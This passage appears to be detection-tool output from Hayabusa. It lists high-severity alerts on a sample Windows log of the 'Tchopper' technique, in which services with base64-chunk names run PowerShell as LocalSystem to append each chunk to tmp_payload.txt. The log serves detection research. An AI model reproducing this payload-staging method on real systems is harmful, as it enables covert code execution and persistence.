2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 